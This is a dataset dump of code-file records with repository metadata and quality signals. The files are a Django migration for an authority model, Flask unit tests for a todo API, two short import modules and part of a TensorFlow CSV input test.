hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
87be78313a7c5f5bb12cfb834160ced23b13c364
| 5,961
|
py
|
Python
|
isiscb/isisdata/migrations/0087_auto_20200125_1935.py
|
bgopalachary/IsisCB
|
c28e3f504eea60ebeff38318d8bb2071abb28ebb
|
[
"MIT"
] | 4
|
2016-01-25T20:35:33.000Z
|
2020-04-07T15:39:52.000Z
|
isiscb/isisdata/migrations/0087_auto_20200125_1935.py
|
bgopalachary/IsisCB
|
c28e3f504eea60ebeff38318d8bb2071abb28ebb
|
[
"MIT"
] | 41
|
2015-08-19T17:34:41.000Z
|
2022-03-11T23:19:01.000Z
|
isiscb/isisdata/migrations/0087_auto_20200125_1935.py
|
bgopalachary/IsisCB
|
c28e3f504eea60ebeff38318d8bb2071abb28ebb
|
[
"MIT"
] | 2
|
2020-11-25T20:18:18.000Z
|
2021-06-24T15:15:41.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-01-25 19:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('isisdata', '0086_auto_20200112_2037'),
]
operations = [
migrations.AlterField(
model_name='authority',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='authority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='authority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalauthority',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='historicalauthority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='historicalauthority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalperson',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='historicalperson',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='historicalperson',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
]
| 97.721311
| 771
| 0.659453
| 859
| 5,961
| 4.514552
| 0.181607
| 0.092831
| 0.05802
| 0.067303
| 0.949974
| 0.949974
| 0.93115
| 0.93115
| 0.908458
| 0.908458
| 0
| 0.023289
| 0.171616
| 5,961
| 60
| 772
| 99.35
| 0.762049
| 0.011575
| 0
| 0.849057
| 1
| 0.056604
| 0.489217
| 0.014604
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037736
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
87f4412218cb770d498325ce33f07051ef73554b
| 9,290
|
py
|
Python
|
tests/resources/test_todo_items.py
|
andela-ojoloko/Todo-Api
|
eef0bbf89d5c40249316211dfc9d5b8385775ad7
|
[
"MIT"
] | null | null | null |
tests/resources/test_todo_items.py
|
andela-ojoloko/Todo-Api
|
eef0bbf89d5c40249316211dfc9d5b8385775ad7
|
[
"MIT"
] | null | null | null |
tests/resources/test_todo_items.py
|
andela-ojoloko/Todo-Api
|
eef0bbf89d5c40249316211dfc9d5b8385775ad7
|
[
"MIT"
] | null | null | null |
import json
import jwt
from ..base import BaseTestCase
from api.models import Todo, User, db, TodoItem
from api.util import generate_token
from datetime import datetime, timedelta
class TodosTestCase(BaseTestCase):
def setUp(self):
db.drop_all()
db.create_all()
self.user_1 = User(
first_name="existing_first_name",
last_name="existing_last_name",
password= "existing_password",
email="test1@yahoo.com"
)
self.user_2 = User(
first_name="existing_first_name",
last_name="existing_last_name",
password= "existin_password",
email="test2@yahoo.com"
)
self.todo_1 = Todo(
title="firt todo"
)
self.todo_2 = Todo(
title="second todo"
)
self.user_1.todos.append(self.todo_1)
self.user_2.todos.append(self.todo_2)
self.user_1.save()
self.user_2.save()
self.token_1 = generate_token(self.user_1)
self.token_2 = generate_token(self.user_2)
self.headers_1 = { "Authorization": f"Bearer {self.token_1}"}
self.headers_2 = { "Authorization": f"Bearer {self.token_2}"}
def test_creating_todo_item_succesfully(self):
"""
tests succesfull creation of todo item
"""
todo_item = {"content": "cut the onions"}
response = self.client.post(f'/api/todos/{self.todo_1.id}/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 201)
self.assertEqual(json_data["todo_item"]["content"], todo_item["content"])
self.assertEqual(json_data["message"], "todo item created")
def test_creating_todo_item_for_non_existent_todo(self):
"""
tests creating todo item for non existent todo
"""
todo_item = {"content": "cut the onions"}
response = self.client.post('/api/todos/190000099/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_creating_todo_item_with_empty_content(self):
"""
tests creating todo item with empty content
"""
todo_item = {"content": ""}
response = self.client.post(f'/api/todos/{self.todo_1.id}/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 422)
self.assertEqual(json_data["message"], "validation failed")
self.assertEqual(json_data["errors"]["content"][0], "Data not provided.")
def test_successfull_deletion_of_todo_item(self):
"""
tests deletion of single todo succesfully
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 200)
self.assertEqual(json_data["message"], "todo item deleted")
def test_deletion_of_todo_item_with_non_existent_todo_id_in_url(self):
"""
tests deletion of todo todo item with no existent todo_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/999999999/todo_items/{todo_item_1.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_deletion_of_todo_item_with_non_existent_todo_item_id_in_url(self):
"""
tests deletion of todo todo item with no existent todo_item_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_1.id}/todo_items/99999999', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo item does not exist")
def test_deletion_of_todo_item_not_created_by_user(self):
"""
tests deletion of todo item not created by user
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_2.id}/todo_items/{todo_item_2.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 401)
self.assertEqual(json_data["message"], "unauthorized")
def test_updating_of_todo_item_not_created_by_user(self):
"""
tests update of todo item not created by user
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_2.id}/todo_items/{todo_item_2.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 401)
self.assertEqual(json_data["message"], "unauthorized")
def test_update_of_todo_item_with_non_existent_todo_id_in_url(self):
"""
tests update of todo todo item with no existent todo_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/999999999/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_update_of_todo_item_with_non_existent_todo_item_id_in_url(self):
"""
tests update of todo todo item with no existent todo_item_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/99999999', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo item does not exist")
def test_update_of_todo_item_successfully(self):
"""
tests update of todo todo item succesfully
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 200)
self.assertEqual(json_data["message"], "todo_item updated")
self.assertEqual(json_data["todo_item"]["complete"], todo_item_update["complete"])
def test_update_of_todo_item_with_invalid_data(self):
"""
tests update of todo todo item with invalid data
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": "how"
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 422)
self.assertEqual(json_data["message"], "validation failed")
| 37.764228
| 121
| 0.634553
| 1,253
| 9,290
| 4.413408
| 0.088587
| 0.137432
| 0.037432
| 0.084629
| 0.85208
| 0.827848
| 0.805063
| 0.775769
| 0.768354
| 0.751356
| 0
| 0.028827
| 0.253175
| 9,290
| 245
| 122
| 37.918367
| 0.768233
| 0.067061
| 0
| 0.582278
| 1
| 0
| 0.180951
| 0.068185
| 0
| 0
| 0
| 0.04898
| 0.170886
| 1
| 0.082278
| false
| 0.012658
| 0.037975
| 0
| 0.126582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3584bacc695f53779eb775bb2ecaeccddf750137
| 134
|
py
|
Python
|
pwnedapi/exceptions/__init__.py
|
DirtySoc/pwnedapi
|
38b8f814788defa62f0a5a7c103093ab01b0baa7
|
[
"MIT"
] | 11
|
2018-04-14T23:26:03.000Z
|
2021-06-13T08:29:01.000Z
|
pwnedapi/exceptions/__init__.py
|
DirtySoc/pwnedapi
|
38b8f814788defa62f0a5a7c103093ab01b0baa7
|
[
"MIT"
] | 22
|
2018-05-06T07:50:12.000Z
|
2019-07-14T09:15:58.000Z
|
pwnedapi/exceptions/__init__.py
|
DirtySoc/pwnedapi
|
38b8f814788defa62f0a5a7c103093ab01b0baa7
|
[
"MIT"
] | 15
|
2018-04-14T22:11:40.000Z
|
2021-12-22T16:58:50.000Z
|
from pwnedapi.exceptions.PasswordException import PasswordException
from pwnedapi.exceptions.RequestException import RequestException
| 44.666667
| 67
| 0.910448
| 12
| 134
| 10.166667
| 0.5
| 0.196721
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 134
| 2
| 68
| 67
| 0.968254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
35cd950d5cb45f024d05d88335b6eab453090e8a
| 107
|
py
|
Python
|
model/__init__.py
|
stromguy/super-resolution
|
102b1211334d0e786c453744505beb389d2e83b1
|
[
"Apache-2.0"
] | 1,230
|
2018-12-30T02:04:13.000Z
|
2022-03-31T11:13:35.000Z
|
model/__init__.py
|
stromguy/super-resolution
|
102b1211334d0e786c453744505beb389d2e83b1
|
[
"Apache-2.0"
] | 91
|
2019-01-15T13:15:03.000Z
|
2022-02-18T11:10:54.000Z
|
model/__init__.py
|
stromguy/super-resolution
|
102b1211334d0e786c453744505beb389d2e83b1
|
[
"Apache-2.0"
] | 347
|
2019-01-12T16:13:05.000Z
|
2022-03-29T15:33:30.000Z
|
from model.common import resolve
from model.common import resolve_single
from model.common import evaluate
| 26.75
| 39
| 0.859813
| 16
| 107
| 5.6875
| 0.4375
| 0.296703
| 0.494505
| 0.692308
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11215
| 107
| 3
| 40
| 35.666667
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ea78215c86af16a01464b28d85b053bc387f1883
| 256
|
py
|
Python
|
bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.manifests.dash.periods.adaptationsets.video.video_api import VideoApi
from bitmovin_api_sdk.encoding.manifests.dash.periods.adaptationsets.video.video_adaptation_set_list_query_params import VideoAdaptationSetListQueryParams
| 85.333333
| 154
| 0.914063
| 32
| 256
| 7
| 0.5625
| 0.107143
| 0.133929
| 0.160714
| 0.625
| 0.625
| 0.625
| 0.625
| 0.625
| 0.625
| 0
| 0
| 0.03125
| 256
| 2
| 155
| 128
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
576b422978fe2e33298574ee1a29bf8efe029f04
| 11,521
|
py
|
Python
|
easy_rec/python/test/csv_input_test.py
|
xia-huang-411303/EasyRec
|
7b2050dddc0bfec9e551e2199a36414a3ee82588
|
[
"Apache-2.0"
] | 285
|
2021-10-11T03:39:43.000Z
|
2022-03-31T09:12:33.000Z
|
easy_rec/python/test/csv_input_test.py
|
xia-huang-411303/EasyRec
|
7b2050dddc0bfec9e551e2199a36414a3ee82588
|
[
"Apache-2.0"
] | 84
|
2021-10-15T03:48:58.000Z
|
2022-03-31T12:38:53.000Z
|
easy_rec/python/test/csv_input_test.py
|
xia-huang-411303/EasyRec
|
7b2050dddc0bfec9e551e2199a36414a3ee82588
|
[
"Apache-2.0"
] | 71
|
2021-10-15T03:33:44.000Z
|
2022-03-31T08:37:11.000Z
|
# -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
"""Define cv_input, the base class for cv tasks."""
import tensorflow as tf
from google.protobuf import text_format
from easy_rec.python.input.csv_input import CSVInput
from easy_rec.python.input.csv_input_ex import CSVInputEx
from easy_rec.python.protos.dataset_pb2 import DatasetConfig
from easy_rec.python.protos.feature_config_pb2 import FeatureConfig
from easy_rec.python.utils import config_util
from easy_rec.python.utils.test_utils import RunAsSubprocess
if tf.__version__ >= '2.0':
from tensorflow.python.framework.ops import disable_eager_execution
disable_eager_execution()
tf = tf.compat.v1
class CSVInputTest(tf.test.TestCase):
def __init__(self, methodName='CSVInputTest'):
super(CSVInputTest, self).__init__(methodName=methodName)
self._input_path = 'data/test/test.csv'
self._input_path_with_quote = 'data/test/test_with_quote.csv'
@RunAsSubprocess
def test_csv_data(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_data_flt_to_str_exception(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field1'
input_type: STRING
}
input_fields {
input_name: 'field[2-3]'
input_type: FLOAT
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
try:
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN) # noqa: F841
passed = True
except Exception:
passed = False
assert not passed, 'if precision is not set, exception should be reported in convert float to string'
@RunAsSubprocess
def test_csv_data_flt_to_str(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field1'
input_type: STRING
}
input_fields {
input_name: 'field[2-3]'
input_type: FLOAT
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
precision: 3
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
